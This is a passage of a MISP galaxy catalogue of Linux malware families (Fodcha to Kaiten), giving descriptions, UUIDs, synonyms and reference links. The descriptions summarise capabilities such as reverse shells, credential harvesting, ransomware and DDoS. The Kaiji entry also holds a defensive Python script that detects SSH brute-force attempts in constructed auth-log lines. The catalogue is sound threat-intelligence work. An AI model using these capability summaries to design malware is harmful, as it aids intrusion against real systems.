UUID 4a64a1ca-e5bc-4a27-bff2-1c68cea05ba7 which can be used as unique global reference for Fodcha in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FontOnLake
This family utilizes custom modules allowing for remote access, credential harvesting (e.g. by modifying sshd) and proxy usage.
It comes with a rootkit as well.
Internal MISP references
UUID c530d62b-e49f-4ccf-9c87-d9f6c16617b7 which can be used as unique global reference for FontOnLake in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FritzFrog
Guardicore has discovered FritzFrog, a sophisticated peer-to-peer (P2P) botnet which has been actively breaching SSH servers since January 2020. It is a worm which is written in Golang, and is modular, multi-threaded and fileless, leaving no trace on the infected machine’s disk.
Internal MISP references
UUID b43b7b4a-9cf4-4f98-b4d2-617a7d84bfa7 which can be used as unique global reference for FritzFrog in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.fritzfrog - webarchive
- https://www.akamai.com/blog/security/fritzfrog-p2p - webarchive
- https://blog.netlab.360.com/p2p-botnets-review-status-continuous-monitoring/ - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
- https://www.guardicore.com/2020/08/fritzfrog-p2p-botnet-infects-ssh-servers/ - webarchive
- https://www.cyberkendra.com/2024/02/fritzfrog-botnet-expands-attack-arsenal.html - webarchive
- https://www.akamai.com/blog/security/fritzfrog-a-new-generation-of-peer-to-peer-botnets - webarchive
- https://www.securityweek.com/sophisticated-fritzfrog-p2p-botnet-returns-after-long-break - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Gaganode (ELF)
According to Synthient, Gaganode is a decentralized bandwidth monetization service that enables both users and publishers to earn crypto for their bandwidth or monetize other people's bandwidth. The SDK intentionally implements RCE, thus aligning Gaganode more closely with malware than standard commercial SDKs.
Internal MISP references
UUID 87d98b0f-a0a2-4de2-987b-abff4a9f4cce which can be used as unique global reference for Gaganode (ELF) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
GhostPenguin
Internal MISP references
UUID 9a7d9f84-13ed-4952-bf12-5efb7382d263 which can be used as unique global reference for GhostPenguin in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Gitpaste-12
Gitpaste-12 is a modular malware first observed in October 2020 targeting Linux-based x86 servers, as well as Linux ARM- and MIPS-based IoT devices. It uses GitHub and Pastebin as dead-drop C2 locations.
Internal MISP references
UUID ffd09324-b585-49c0-97e5-536d386f49a5 which can be used as unique global reference for Gitpaste-12 in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Glupteba Proxy
ARM32 SOCKS proxy, written in Go, used in the Glupteba campaign.
Internal MISP references
UUID bcfec1d3-ff29-4677-a5f6-be285e98a9db which can be used as unique global reference for Glupteba Proxy in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
GobRAT
Internal MISP references
UUID ddba032c-ebde-4736-b7ef-8376702dac6a which can be used as unique global reference for GobRAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Godlua
Internal MISP references
UUID f3cb0a78-1608-44b1-9949-c6addf6c13ce which can be used as unique global reference for Godlua in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
gokcpdoor
According to LAC, this malware is written in Go and was observed in 2022 used by an unknown China-based APT across several incidents in Japan. This backdoor has 20 commands and connects with C2 servers via KCP over UDP.
Internal MISP references
UUID 23f97417-5028-47c0-8d97-a86b55d4f613 which can be used as unique global reference for gokcpdoor in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Gomir
Internal MISP references
UUID 6fb012ce-c822-471c-9c15-4c7ecfb55528 which can be used as unique global reference for Gomir in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
GOREshell
Internal MISP references
UUID 886757fe-ef0b-47fd-a236-5331d1e0aa4e which can be used as unique global reference for GOREshell in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
GOREVERSE
GOREVERSE is a publicly available reverse shell backdoor written in GoLang that operates over Secure Shell (SSH).
Internal MISP references
UUID f282559f-27a9-42f6-b4c7-c1cc547fb63f which can be used as unique global reference for GOREVERSE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Gorilla
A DDoS botnet, based on Mirai.
Internal MISP references
UUID 029f052f-a0f9-4902-a403-b4568fb2f25d which can be used as unique global reference for Gorilla in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
GOSH
Internal MISP references
UUID 931f57f9-1edd-47b8-bf80-ae7190434558 which can be used as unique global reference for GOSH in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
GoTitan
GoTitan is a DDoS bot under development, which supports ten different methods of launching distributed denial-of-service (DDoS) attacks: UDP, UDP HEX, TCP, TLS, RAW, HTTP GET, HTTP POST, HTTP HEAD, and HTTP PUT.
Internal MISP references
UUID 92007a5e-d408-4c95-b4c2-7b4e4e29559e which can be used as unique global reference for GoTitan in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
GreedyAntd
Internal MISP references
UUID 6aee7daf-9f63-4a70-bfe5-9c95cbdcb1e3 which can be used as unique global reference for GreedyAntd in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Gwisin (ELF)
Internal MISP references
UUID c02d252d-95cc-45bc-adb6-bae51b16c55b which can be used as unique global reference for Gwisin (ELF) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
HabitsRAT (ELF)
Internal MISP references
UUID e87e7f26-f2a1-437f-8650-312050e3cd48 which can be used as unique global reference for HabitsRAT (ELF) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Hadooken
Internal MISP references
UUID 84e9e1ec-3676-4d64-9134-c48221c03e38 which can be used as unique global reference for Hadooken in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Haiduc
Internal MISP references
UUID dd85732f-cbf8-4f2c-af5c-f51ef7d99b6a which can be used as unique global reference for Haiduc in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Hajime
Internal MISP references
UUID ff8ee85f-4175-4f5a-99e5-0cbc378f1489 which can be used as unique global reference for Hajime in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.hajime - webarchive
- https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf - webarchive
- https://blog.netlab.360.com/p2p-botnets-review-status-continuous-monitoring/ - webarchive
- https://x86.re/blog/hajime-a-follow-up/ - webarchive
- https://github.com/Psychotropos/hajime_hashes - webarchive
- https://blog.netlab.360.com/quick-summary-port-8291-scan-en/ - webarchive
- https://www.symantec.com/connect/blogs/hajime-worm-battles-mirai-control-internet-things - webarchive
- https://par.nsf.gov/servlets/purl/10096257 - webarchive
- https://security.radware.com/WorkArea/DownloadAsset.aspx?id=1461 - webarchive
- http://blog.netlab.360.com/hajime-status-report-en/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Hakai
Internal MISP references
UUID 0839c28a-ea11-44d4-93d1-24b246ef6743 which can be used as unique global reference for Hakai in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
HandyMannyPot
Internal MISP references
UUID 0b323b91-ad57-4127-99d1-6a2485be70df which can be used as unique global reference for HandyMannyPot in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Hand of Thief
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Hand of Thief.
| Known Synonyms |
|---|
| Hanthie |
Internal MISP references
UUID db3e17f0-677b-4bdb-bc26-25e62a74673d which can be used as unique global reference for Hand of Thief in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.hand_of_thief - webarchive
- https://blog.avast.com/2013/08/27/linux-trojan-hand-of-thief-ungloved/ - webarchive
- https://web.archive.org/web/20130815040638/https://blogs.rsa.com/thieves-reaching-for-linux-hand-of-thief-trojan-targets-linux-inth3wild/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
HeadCrab
Internal MISP references
UUID 7bb684d8-ad5c-4d01-91eb-2c600dbcda2a which can be used as unique global reference for HeadCrab in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
HellDown
Ransomware.
Internal MISP references
UUID 6dd0e6e4-536b-4271-a948-39282ff48940 which can be used as unique global reference for HellDown in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.helldown - webarchive
- https://medium.com/@lcam/how-to-target-european-smes-with-ransomware-through-zyxel-c9779e96369a - webarchive
- https://x.com/nextronresearch/status/1851983952409473308 - webarchive
- https://www.linkedin.com/posts/threatmon_helldown-ransomware-malware-technical-analysis-activity-7288187849458245633-cyFk - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
HelloBot (ELF)
Internal MISP references
UUID b9fec670-2b1e-4287-ac93-68360d5adcf4 which can be used as unique global reference for HelloBot (ELF) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
HelloKitty (ELF)
Linux version of the HelloKitty ransomware.
Internal MISP references
UUID 785cadf7-5c99-40bc-b718-8a98d9aa90b7 which can be used as unique global reference for HelloKitty (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.hellokitty - webarchive
- https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf - webarchive
- https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/ - webarchive
- https://blog.sekoia.io/vice-society-a-discreet-but-steady-double-extortion-ransomware-group/ - webarchive
- https://unit42.paloaltonetworks.com/emerging-ransomware-groups/ - webarchive
- https://soolidsnake.github.io/2021/07/17/hellokitty_linux.html - webarchive
- https://www.bleepingcomputer.com/news/security/linux-version-of-hellokitty-ransomware-targets-vmware-esxi-servers/ - webarchive
- https://blog.sekoia.io/vice-society-a-discreet-but-steady-double-extortion-ransomware-group - webarchive
- https://www.govinfosecurity.com/vice-society-ransomware-gang-disrupted-spar-stores-a-18225 - webarchive
- https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
HiatusRAT
Lumen discovered this malware used in a campaign targeting business-grade routers, combining a RAT they call HiatusRAT with a variant of tcpdump for traffic interception.
Internal MISP references
UUID 69dcee87-dc61-48d4-a6af-177396bdb850 which can be used as unique global reference for HiatusRAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
HiddenWasp
HiddenWasp is a Linux-based Trojan used to target systems for remote control. It comes in the form of a statically linked ELF binary with stdlibc++.
Internal MISP references
UUID ae00d48d-c515-4ca9-a29c-8c53a78f8c73 which can be used as unique global reference for HiddenWasp in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.hiddenwasp - webarchive
- https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/ - webarchive
- https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought - webarchive
- https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/ - webarchive
- https://cocomelonc.github.io/linux/2024/11/22/linux-hacking-3.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Hide and Seek
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Hide and Seek.
| Known Synonyms |
|---|
| HNS |
Internal MISP references
UUID 41bf8f3e-bb6a-445d-bb74-d08aae61a94b which can be used as unique global reference for Hide and Seek in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.hideandseek - webarchive
- https://www.bleepingcomputer.com/news/security/hns-evolves-from-iot-to-cross-platform-botnet/ - webarchive
- https://www.bleepingcomputer.com/news/security/hide-and-seek-becomes-first-iot-botnet-capable-of-surviving-device-reboots/ - webarchive
- https://unit42.paloaltonetworks.com/hide-n-seek-botnet-updates-arsenal-with-exploits-against-nexus-repository-manager-thinkphp/ - webarchive
- https://blog.avast.com/hide-n-seek-botnet-continues - webarchive
- https://labs.bitdefender.com/2018/05/hide-and-seek-iot-botnet-resurfaces-with-new-tricks-persistence/ - webarchive
- https://threatlabs.avast.com/botnet - webarchive
- https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/ - webarchive
- https://www.fortinet.com/blog/threat-research/searching-for-the-reuse-of-mirai-code--hide--n-seek-bot.html - webarchive
- https://blog.netlab.360.com/hns-botnet-recent-activities-en/ - webarchive
- https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
HinataBot
HinataBot is a Go-based DDoS-focused botnet. It was observed in the first quarter of 2023 targeting HTTP and SSH endpoints leveraging old vulnerabilities and weak credentials. Amongst those infection vectors are exploitation of the miniigd SOAP service on Realtek SDK devices (CVE-2014-8361), Huawei HG532 routers (CVE-2017-17215), and exposed Hadoop YARN servers.
Internal MISP references
UUID b10fc382-b740-417a-98fa-e23d10223958 which can be used as unique global reference for HinataBot in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Hipid
Internal MISP references
UUID d55eb2f1-e24d-4b50-9839-2e53b5059bae which can be used as unique global reference for Hipid in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Hive (ELF)
Internal MISP references
UUID c22452c8-c818-4577-9737-0b87342c7913 which can be used as unique global reference for Hive (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.hive - webarchive
- https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-hive - webarchive
- https://therecord.media/hive-ransomware-shuts-down-california-health-care-organization/ - webarchive
- https://twitter.com/malwrhunterteam/status/1455628865229950979 - webarchive
- https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again - webarchive
- https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html - webarchive
- https://github.com/reecdeep/HiveV5_file_decryptor - webarchive
- https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/ - webarchive
- https://blog.group-ib.com/hive - webarchive
- https://thehackernews.com/2022/02/master-key-for-hive-ransomware.html - webarchive
- https://lifars.com/2022/02/how-to-decrypt-the-files-encrypted-by-the-hive-ransomware/ - webarchive
- https://github.com/rivitna/Malware/tree/main/Hive - webarchive
- https://securityaffairs.co/wordpress/128232/security/recover-files-hive-ransomware.html - webarchive
- https://yoroi.company/research/on-the-footsteps-of-hive-ransomware/ - webarchive
- https://yoroi.company/wp-content/uploads/2022/07/Yoroi-On-The-Footsteps-of-Hive-Ransomware.pdf - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v - webarchive
- https://twitter.com/ESETresearch/status/1454100591261667329 - webarchive
- https://arxiv.org/pdf/2202.08477.pdf - webarchive
- https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/ - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://therecord.media/academics-publish-method-for-recovering-data-encrypted-by-the-hive-ransomware/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Horse Shell
Checkpoint Research describes this as a custom MIPS32 ELF implant that is part of a custom firmware image affiliated with the Chinese state-sponsored actor “Camaro Dragon”. HorseShell, the main implant inserted into the modified firmware by the attackers, provides the attacker with 3 main functionalities:
- Remote shell: execution of arbitrary shell commands on the infected router
- File transfer: upload and download files to and from the infected router
- SOCKS tunneling: relay communication between different clients
Internal MISP references
UUID 9d04d96a-92fd-4731-a3b5-a3fdafd3e523 which can be used as unique global reference for Horse Shell in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Hubnr
Internal MISP references
UUID c55389b0-e778-4cf9-9030-3d1efc1224c9 which can be used as unique global reference for Hubnr in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
HyperSSL (ELF)
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HyperSSL (ELF).
| Known Synonyms |
|---|
| SysUpdate |
Internal MISP references
UUID 263aaef5-9758-49f1-aff1-9a509f545bb3 which can be used as unique global reference for HyperSSL (ELF) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
iceFire
Internal MISP references
UUID c03b2f7f-31ed-4133-b947-4b8846d90f19 which can be used as unique global reference for iceFire in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Icnanker
Internal MISP references
UUID cd9f128b-6502-4e1b-a5b3-25f3c7f01ca3 which can be used as unique global reference for Icnanker in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
INC
Internal MISP references
UUID fa3f90a3-40e3-4636-90f9-3e02bf645afd which can be used as unique global reference for INC in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.inc - webarchive
- https://cisoseries.com/cybersecurity-news-inc-targets-healthcare-providence-schools-cyberattack-apple-ipads-bricked/ - webarchive
- https://twitter.com/malwrhunterteam/status/1689029459255373826 - webarchive
- https://unit42.paloaltonetworks.com/inc-ransomware-rebrand-to-lynx/ - webarchive
- https://x.com/MsftSecIntel/status/1836456406276342215 - webarchive
- https://nikhilh-20.github.io/blog/inc_ransomware/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Interlock (ELF)
According to Sekoia, this is the ransomware used by the Interlock ransomware intrusion set, which was first observed in September 2024 conducting Big Game Hunting and double extortion campaigns.
Internal MISP references
UUID d43c0e42-27e5-4eeb-aeca-65f3eec67d6f which can be used as unique global reference for Interlock (ELF) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
elf.iocontrol
IOControl is a Linux backdoor which targets ARM-based IoT and OT systems, with a particular focus on fuel and industrial control systems.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular elf.iocontrol.
| Known Synonyms |
|---|
| OrpraCab |
| QueueCat |
Internal MISP references
UUID d681df67-ea57-4384-a8bc-8f24f811000b which can be used as unique global reference for elf.iocontrol in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.iocontrol - webarchive
- https://www.armis.com/blog/iocontrol-malware-whats-new-whats-not/ - webarchive
- https://web-assets.claroty.com/resource-downloads/team82_iocontrol.pdf - webarchive
- https://claroty.com/team82/research/inside-a-new-ot-iot-cyber-weapon-iocontrol - webarchive
- https://www.bleepingcomputer.com/news/security/new-iocontrol-malware-used-in-critical-infrastructure-attacks/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
IoT Reaper
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular IoT Reaper.
| Known Synonyms |
|---|
| IoTroop |
| Reaper |
| iotreaper |
Internal MISP references
UUID 37c357a1-ec09-449f-b5a9-c1ef1fba2de2 which can be used as unique global reference for IoT Reaper in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.iot_reaper - webarchive
- https://krebsonsecurity.com/2017/10/reaper-calm-before-the-iot-security-storm - webarchive
- https://research.checkpoint.com/new-iot-botnet-storm-coming/ - webarchive
- http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
IPStorm (ELF)
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular IPStorm (ELF).
| Known Synonyms |
|---|
| InterPlanetary Storm |
Internal MISP references
UUID a24f9c4b-1fa7-4da2-9929-064345389e67 which can be used as unique global reference for IPStorm (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.ipstorm - webarchive
- https://www.intezer.com/blog/research/a-storm-is-brewing-ipstorm-now-has-linux-malware/ - webarchive
- https://maldbg.com/ipstorm-golang-malware-windows - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
- https://www.justice.gov/usao-pr/pr/russian-and-moldovan-national-pleads-guilty-operating-illegal-botnet-proxy-service - webarchive
- https://www.anomali.com/blog/the-interplanetary-storm-new-malware-in-wild-using-interplanetary-file-systems-ipfs-p2p-network - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/376/Bitdefender-Whitepaper-IPStorm.pdf - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
IZ1H9
According to Fortinet, this is a Mirai-based DDoS botnet.
Internal MISP references
UUID 6e98a149-9ce2-4750-9680-69f3ced5f33e which can be used as unique global reference for IZ1H9 in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
JenX
Internal MISP references
UUID 6a4365fc-8448-4270-ba93-0341788d004b which can be used as unique global reference for JenX in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
J-Magic
According to Lumen, J-Magic is a variant of cd00r that passively watches network traffic for five predefined parameters before activating. When one of these parameters, or "magic packets", is received, the agent sends back a secondary challenge. Once that challenge is completed, J-Magic establishes a reverse shell, allowing the operators to control the device, steal data, or deploy further malicious software.
Internal MISP references
UUID 7398222a-c9a5-4f59-8799-1f8fce3604c8 which can be used as unique global reference for J-Magic in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Kaden
Kaden is a DDoS botnet that is heavily based on Bashlite/Gafgyt. Alongside its DDoS capabilities it contains wiper functionality, which at the time of writing cannot be triggered.
Internal MISP references
UUID eebd19b4-6671-4b17-be6a-cc467e5869a5 which can be used as unique global reference for Kaden in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Kaiji
Kaiji surfaced in late April 2020. Intezer describes it as DDoS malware written in Go that spreads through SSH brute-force attacks. Recovered function names are English transliterations of Chinese words, hinting at its origin. The name Kaiji was given by MalwareMustDie based on strings found in samples.
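The SSH brute-force spreading described above leaves a characteristic trace in the sshd authentication log: a burst of failed password logins from one source, followed by a successful login from that same source when a guess lands. The following is an added example of that detection logic, not code from Malpedia, Intezer or the Kaiji sample. It assumes the classic syslog layout that sshd writes to /var/log/auth.log (journald output looks different and would need a different regex); the log lines, hostnames and addresses are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd lines in the syslog layout found in /var/log/auth.log on
# Debian-style hosts. They are made up for this example and are not from any
# real Kaiji incident; the addresses come from documentation ranges.
SAMPLE_AUTH_LOG = """\
May  2 10:14:01 host1 sshd[2210]: Failed password for root from 203.0.113.7 port 51012 ssh2
May  2 10:14:03 host1 sshd[2212]: Failed password for invalid user admin from 203.0.113.7 port 51013 ssh2
May  2 10:14:05 host1 sshd[2214]: Failed password for root from 203.0.113.7 port 51014 ssh2
May  2 10:14:08 host1 sshd[2216]: Failed password for invalid user admin from 203.0.113.7 port 51015 ssh2
May  2 10:14:11 host1 sshd[2218]: Failed password for root from 203.0.113.7 port 51016 ssh2
May  2 10:14:15 host1 sshd[2220]: Failed password for root from 203.0.113.7 port 51017 ssh2
May  2 10:14:20 host1 sshd[2222]: Accepted password for root from 203.0.113.7 port 51018 ssh2
May  2 10:15:02 host1 sshd[2230]: Failed password for alice from 198.51.100.9 port 40022 ssh2
May  2 10:15:09 host1 sshd[2232]: Accepted password for alice from 198.51.100.9 port 40023 ssh2
May  2 10:16:00 host1 sshd[2240]: Accepted publickey for bob from 192.0.2.5 port 50010 ssh2: ED25519 SHA256:constructed
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+ ssh2"
)


def parse_events(log_text):
    """Return (timestamp, result, user, source) for each authentication line."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # disconnects, PAM messages and other sshd noise
        # syslog timestamps carry no year: fine for a sliding window, wrong across New Year
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["src"]))
    return events


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Flag sources with >= threshold failed logins inside any window_seconds span.
    A later success from the same source is reported as well, because that is the
    moment a Kaiji-style worm stops guessing and starts installing itself."""
    by_src = defaultdict(list)
    for ev in parse_events(log_text):
        by_src[ev[3]].append(ev)

    findings = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e[0])
        failures = [e for e in evs if e[1] == "Failed"]
        peak, start = 0, 0
        for i, ev in enumerate(failures):  # two-pointer sliding window over failures
            while (ev[0] - failures[start][0]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, i - start + 1)
        if not failures or peak < threshold:
            continue
        first_failure = failures[0][0]
        findings[src] = {
            "failures": len(failures),
            "peak_in_window": peak,
            "users_tried": sorted({e[2] for e in failures}),
            "success_after_failures": any(
                e[1] == "Accepted" and e[0] >= first_failure for e in evs
            ),
        }
    return findings


if __name__ == "__main__":
    for src, info in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(src, info)
```

The threshold and window are deliberately low so the constructed sample trips them; on a real host tune them against your own baseline, and treat `success_after_failures` as the alert that warrants an immediate look at what that session did next.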
Internal MISP references
UUID 33fe7943-c1b3-48d5-b287-126390b091f0 which can be used as unique global reference for Kaiji in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiji - webarchive
- https://intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/ - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
- https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/ - webarchive
- https://www.bitdefender.com/box/blog/iot-news/kaiji-new-strain-iot-malware-seizing-control-launching-ddos-attacks/ - webarchive
- https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775 - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/ - webarchive
- https://www.elastic.co/security-labs/betting-on-bots - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Kaiten
According to netenrich, Kaiten is a Trojan horse that opens a back door on the compromised computer, allowing it to perform other malicious activities. The trojan does not create any copies of itself. This backdoor arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Kaiten.
| Known Synonyms |
|---|
| STD |
Internal MISP references
UUID 9b618703-58f6-4f0b-83a4-d4f13e2e5d12 which can be used as unique global reference for Kaiten in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiten - webarchive
- https://www.lacework.com/blog/the-kek-security-network/ - webarchive
- https://www.trendmicro.com/en_us/research/20/i/exposed-docker-server-abused-to-drop-cryptominer-ddos-bot-.html - webarchive
- https://www.lacework.com/the-kek-security-network/ - webarchive
- https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf - webarchive
